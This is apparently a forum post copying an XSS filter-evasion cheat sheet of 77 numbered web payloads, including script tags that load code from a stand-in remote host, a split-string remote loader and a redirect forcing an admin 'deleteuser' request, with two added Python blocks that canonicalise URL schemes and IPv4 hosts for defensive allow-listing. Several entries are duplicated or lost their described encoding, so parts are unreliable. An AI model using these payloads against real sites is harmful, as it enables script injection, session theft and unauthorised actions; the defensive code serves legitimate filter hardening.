It seems t00ls has relatively little material on XSS; I saw something good and copied it over, in case any of you want to bookmark it.

(1) Plain XSS JavaScript injection
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2) IMG tag XSS using JavaScript commands
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3) IMG tag, no semicolon, no quotes
<IMG SRC=javascript:alert('XSS')>

(4) IMG tag, case-insensitive
<IMG SRC=JaVaScRiPt:alert('XSS')>

(5) HTML encoding (semicolons required)
<IMG SRC=javascript:alert("XSS")>

(6) Malformed IMG tag
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">

(7) String.fromCharCode (calculator)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8) UTF-8 Unicode encoding (calculator)
<IMG SRC=jav..[omitted]..S')>

(9) 7-bit UTF-8 Unicode encoding, no semicolons (calculator)
<IMG SRC=jav..[omitted]..S')>

(10) Hex encoding, also no semicolons (calculator)
<IMG SRC=java..[omitted]..XSS')>

(11) Embedded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(12) Embedded encoded tab, splitting the JavaScript
<IMG SRC="jav ascript:alert('XSS');">

(13) Embedded newline
<IMG SRC="jav ascript:alert('XSS');">

(14) Embedded carriage return
<IMG SRC="jav ascript:alert('XSS');">

(15) Multi-line injected JavaScript, an extreme XSS example
<IMG SRC="javascript:alert('XSS')">

(16) Working around a character limit (must be on the same page)
<script>z='document.'</script>
<script>z=z+'write("'</script>
<script>z=z+'<script'</script>
<script>z=z+' src=ht'</script>
<script>z=z+'tp://ww'</script>
<script>z=z+'w.shell'</script>
<script>z=z+'.net/1.'</script>
<script>z=z+'js></sc'</script>
<script>z=z+'ript>")'</script>
<script>eval(z)</script>

(17) Null character
perl -e 'print "<IMG SRC=java\0script:alert(\"XSS\")>";' > out

(18) Null character 2. Null characters basically have no effect domestically, because there is nowhere to make use of them.
perl -e 'print "<SCR\0IPT>alert(\"XSS\")</SCR\0IPT>";' > out
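Entries (5) through (19) share one lesson for the defender: a filter that looks for the literal string "javascript:" in an attribute value is beaten by character references (decimal or hex, with or without the semicolon), by tab, newline, carriage return or NUL inside the scheme, and by leading whitespace and control characters, because the browser decodes and strips all of those before it decides what scheme it is looking at. The check below is an added example, not code from the original post or from the cheat sheet it copies: it canonicalises an attribute value the way a browser does (entity decoding, then deletion of the ignored characters) and only then reads the scheme, and it allow-lists http/https and relative URLs rather than block-listing "javascript". The sample values are constructed from the patterns in entries (3) to (19).

```python
"""Canonicalise an HTML URL attribute value before checking its scheme.
Added example; not part of the original post."""
import html
import re
from typing import Optional

# Characters a browser's URL parser deletes from the input (tab, LF, CR).
# NUL is added because legacy browsers ignored it inside the scheme
# (entry 17); deleting it here makes the check stricter, never weaker.
_DELETED = dict.fromkeys(map(ord, "\t\n\r\x00"), None)
# Leading C0 controls and space are trimmed from a URL before parsing.
_LEADING = "".join(map(chr, range(0x21)))
# A URL scheme: a letter followed by letters, digits, '+', '.' or '-', then ':'.
_SCHEME = re.compile(r"^([a-zA-Z][a-zA-Z0-9+.\-]*):")

# Allow-list, not block-list: anything not listed here is rejected.
ALLOWED_SCHEMES = frozenset({"http", "https"})


def canonical_scheme(value: str) -> Optional[str]:
    """Return the lower-cased scheme a browser would act on for this attribute
    value, or None when the value has no scheme (a relative URL)."""
    # html.unescape handles named references and numeric ones such as
    # &#106; &#0000106 &#x6A (with or without the trailing semicolon),
    # which is exactly what entries (5) and (8)-(12) rely on.
    decoded = html.unescape(value)
    decoded = decoded.translate(_DELETED).lstrip(_LEADING)
    m = _SCHEME.match(decoded)
    return m.group(1).lower() if m else None


def is_allowed_url(value: str, allowed=ALLOWED_SCHEMES) -> bool:
    """True for relative URLs and for allowed schemes; False for javascript:,
    vbscript:, data: and any other scheme, however it is encoded."""
    scheme = canonical_scheme(value)
    return scheme is None or scheme in allowed


if __name__ == "__main__":
    # Constructed samples modelled on the page's entries.  Most of them never
    # contain the literal text "javascript:", which is why substring filters fail.
    samples = [
        "javascript:alert('XSS')",                                   # (3)
        "JaVaScRiPt:alert('XSS')",                                   # (4)
        "&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;alert('XSS')",  # (5)
        "&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A;alert('XSS')",        # (10)
        "jav\tascript:alert('XSS')",                                 # (11)
        "jav&#x09;ascript:alert('XSS')",                             # (12)
        "jav\nascript:alert('XSS')",                                 # (13)
        "java\x00script:alert('XSS')",                               # (17)
        " &#14; javascript:alert('XSS')",                            # (19)
        "http://example.com/",
        "/relative/path?q=1",
    ]
    for s in samples:
        print(f"{s!r:75} scheme={canonical_scheme(s)!r:14} allowed={is_allowed_url(s)}")
```

Run this per attribute value (src, href, background, dynsrc, lowsrc, and the url() inside style) from inside an HTML sanitizer at output time; scanning the whole document with a regex for "<IMG SRC=" reintroduces the same parsing gap the entries above exploit.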
(19) Spaces and meta characters before the JavaScript in the IMG tag
<IMG SRC=" javascript:alert('XSS');">

(20) Non-alpha-non-digit XSS
<SCRIPT/XSS SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(21) Non-alpha-non-digit XSS 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>

(22) Non-alpha-non-digit XSS 3
<SCRIPT/SRC="http://3w.org/XSS/xss.js"></SCRIPT>

(23) Double open brackets
<<SCRIPT>alert("XSS");//<</SCRIPT>

(24) No closing script tag (Firefox and similar browsers only)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25) No closing script tag 2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26) Half-open HTML/JavaScript XSS
<IMG SRC="javascript:alert('XSS')"

(27) Double open angle brackets
<iframe src=http://3w.org/XSS.html <

(28) No single quotes, double quotes, or semicolons
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29) Escaping the JavaScript escape filter
\";alert('XSS');//

(30) Closing the TITLE tag
</TITLE><SCRIPT>alert("XSS");</SCRIPT>

(31) INPUT image
<INPUT SRC="javascript:alert('XSS');">

(32) BODY image
<BODY BACKGROUND="javascript:alert('XSS')">

(33) BODY tag
<BODY('XSS')>

(34) IMG DYNSRC
<IMG DYNSRC="javascript:alert('XSS')">

(35) IMG LOWSRC
<IMG LOWSRC="javascript:alert('XSS')">

(36) BGSOUND
<BGSOUND SRC="javascript:alert('XSS');">

(37) STYLE sheet
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">

(38) Remote style sheet
<LINK REL="stylesheet" HREF="http://3w.org/xss.css">

(39) List-style-image
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS

(40) IMG VBScript
<IMG SRC='vbscript:msgbox("XSS")'>

(41) META link URL
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">

(42) Iframe
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

(43) Frame
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>

(44) Table
<TABLE BACKGROUND="javascript:alert('XSS')">

(45) TD
<TABLE><TD BACKGROUND="javascript:alert('XSS')">

(46) DIV background-image
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(47) DIV background-image with extra characters appended (1-32, 34, 39, 160, 8192-8, 13, 12288, 65279)
<DIV STYLE="background-image: url(javascript:alert('XSS'))">

(48) DIV expression
<DIV STYLE="width: expression(alert('XSS'));">

(49) STYLE attribute with a split expression
<IMG STYLE="xss:expression(alert('XSS'))">

(50) Anonymous STYLE tag (made of an open angle bracket and a name beginning with a letter)
<XSS STYLE="xss:expression(alert('XSS'))">

(51) STYLE background-image
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>

(52) IMG STYLE method
exppression(alert("XSS"))'>

(53) STYLE background
<STYLE><STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

(54) BASE
<BASE HREF="javascript:alert('XSS');//">

(55) EMBED tag; you can embed a Flash file that contains XSS
<EMBED SRC="http://3w.org/XSS/xss.swf" ></EMBED>

(56) ActionScript inside Flash can be used to smuggle in your XSS code
a="get";
b="URL(\"";
c="javascript:";
d="alert('XSS');\")";
eval(a+b+c+d);

(57) XML namespace. The .HTC file must be on the same server as your XSS payload
<HTML xmlns:xss>
<?import namespace="xss" implementation="http://3w.org/XSS/xss.htc">
<xss:xss>XSS</xss:xss>
</HTML>

(58) If your JS is filtered, you can put the JS code inside an image and use that
<SCRIPT SRC=""></SCRIPT>

(59) IMG embedded command; can execute arbitrary commands
<IMG SRC="http://www.XXX.com/a.php?a=b">

(60) IMG embedded command (a.jpg on the same server)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61) Bypassing symbol filters
<SCRIPT a=">" SRC="http://3w.org/xss.js"></SCRIPT>

(62)
<SCRIPT =">" SRC="http://3w.org/xss.js"></SCRIPT>

(63)
<SCRIPT a=">" " SRC="http://3w.org/xss.js"></SCRIPT>

(64)
<SCRIPT "a='>'" SRC="http://3w.org/xss.js"></SCRIPT>

(65)
<SCRIPT a=`>` SRC="http://3w.org/xss.js"></SCRIPT>

(66)
<SCRIPT a=">'>" SRC="http://3w.org/xss.js"></SCRIPT>

(67)
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://3w.org/xss.js"></SCRIPT>

(68) URL bypass
<A HREF="http://127.0.0.1/">XSS</A>

(69) URL encoding
<A HREF="http://3w.org">XSS</A>

(70) IP in decimal
<A HREF="http://3232235521">XSS</A>

(71) IP in hex
<A HREF="http://0xc0.0xa8.0x00.0x01">XSS</A>

(72) IP in octal
<A HREF="http://0300.0250.0000.0001">XSS</A>

(73) Mixed encoding
<A HREF="h
tt p://6 6.000146.0x7.147/">XSS</A>

(74) Omitting [http:]
<A HREF="//www.google.com/">XSS</A>

(75) Omitting [www]
<A HREF="http://google.com/">XSS</A>

(76) Absolute DNS with a trailing dot
<A HREF="http://www.google.com./">XSS</A>
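Entries (70) through (76) are host-name tricks rather than script injection: the same address written as one decimal number, as hex or octal octets, as a mix of the three, scheme-relative, or with a trailing dot. They matter to a defender wherever a URL is compared against an allow-list (redirect targets, link filters, SSRF checks), because a string comparison against "www.google.com" or "192.168.0.1" misses every one of these forms. The code below is an added example, not part of the original post: it parses the legacy IPv4 forms browsers accept into dotted-quad notation, strips the trailing dot, and compares canonical hosts. It goes a little beyond the page in also refusing "///host" and "http://user@host" shapes, which Python's urlsplit would otherwise resolve differently from a browser. The allow-list and the URLs are constructed for the demonstration.

```python
"""Canonicalise URL hosts before comparing them with an allow-list.
Added example; not part of the original post."""
import ipaddress
import re
from typing import Iterable, Optional
from urllib.parse import urlsplit

# One dotted component of a legacy IPv4 literal: "0x.." hex, leading-zero
# octal, or plain decimal (the three notations in entries (70)-(72)).
_IPV4_PART = re.compile(r"^(?:0[xX]([0-9a-fA-F]*)|(0[0-7]*)|([1-9][0-9]*))$")
_DELETED = dict.fromkeys(map(ord, "\t\n\r"), None)   # URL parsers drop these anywhere
_LEADING = "".join(map(chr, range(0x21)))             # and trim leading/trailing C0 + space


def _ipv4_part(part: str) -> Optional[int]:
    m = _IPV4_PART.match(part)
    if not m:
        return None
    if m.group(1) is not None:            # hex; a bare "0x" counts as 0
        return int(m.group(1), 16) if m.group(1) else 0
    if m.group(2) is not None:            # octal (also covers a bare "0")
        return int(m.group(2), 8)
    return int(m.group(3))                # decimal


def legacy_ipv4(host: str) -> Optional[str]:
    """Parse the 1-to-4-part IPv4 forms browsers accept (decimal, hex, octal or
    a mix, the last part filling the remaining bytes) and return dotted-quad
    notation, or None when the host is not such a literal."""
    parts = host.split(".")
    if len(parts) > 1 and parts[-1] == "":
        parts.pop()                       # tolerate a single trailing dot
    if not 1 <= len(parts) <= 4:
        return None
    nums = [_ipv4_part(p) for p in parts]
    if any(n is None for n in nums):
        return None
    *lead, last = nums
    if any(n > 255 for n in lead) or last >= 256 ** (5 - len(nums)):
        return None
    value = last
    for i, n in enumerate(lead):
        value += n << (8 * (3 - i))
    return str(ipaddress.IPv4Address(value))


def canonical_host(host: str) -> str:
    """Lower-case, drop the trailing dot of entry (76), and rewrite any
    numeric literal of entries (70)-(73) as a plain dotted quad."""
    h = host.translate(_DELETED).strip(_LEADING).lower()
    if h.endswith("."):
        h = h[:-1]
    return legacy_ipv4(h) or h


def is_allowed_redirect(url: str, allowed_hosts: Iterable[str]) -> bool:
    """Allow-list check for a redirect target: same-site relative paths pass,
    http(s) URLs whose canonical host is listed pass, everything else fails."""
    u = url.translate(_DELETED).strip(_LEADING)
    if re.match(r"^/(?![/\\])", u):       # "/path", but not "//host" or "/\host"
        return True
    parts = urlsplit(u)
    if parts.scheme not in ("", "http", "https") or not parts.hostname:
        return False                      # javascript:, data:, "///host", ...
    allowed = {canonical_host(h) for h in allowed_hosts}
    return canonical_host(parts.hostname) in allowed


if __name__ == "__main__":
    # Constructed allow-list and targets modelled on entries (70)-(77).
    ALLOWED = ["www.google.com", "192.168.0.1"]
    for target in [
        "http://3232235521/",                  # (70)
        "http://0xc0.0xa8.0x00.0x01/",         # (71)
        "http://0300.0250.0000.0001/",         # (72)
        "h\ntt\tp://6\t6.000146.0x7.147/",     # (73), as the browser sees it
        "//www.google.com/",                   # (74)
        "http://google.com/",                  # (75): a different host
        "http://www.google.com./",             # (76)
        "javascript:document.location='http://www.google.com/'",  # (77)
    ]:
        print(f"{target!r:60} -> {is_allowed_redirect(target, ALLOWED)}")
```

Python's urlsplit does not treat a backslash as a path separator the way browsers do, so for production use pair this canonicalisation with a WHATWG-compliant URL parser, and keep the allow-list itself in canonical form so the comparison is always like against like.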
(77) javascript link
<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>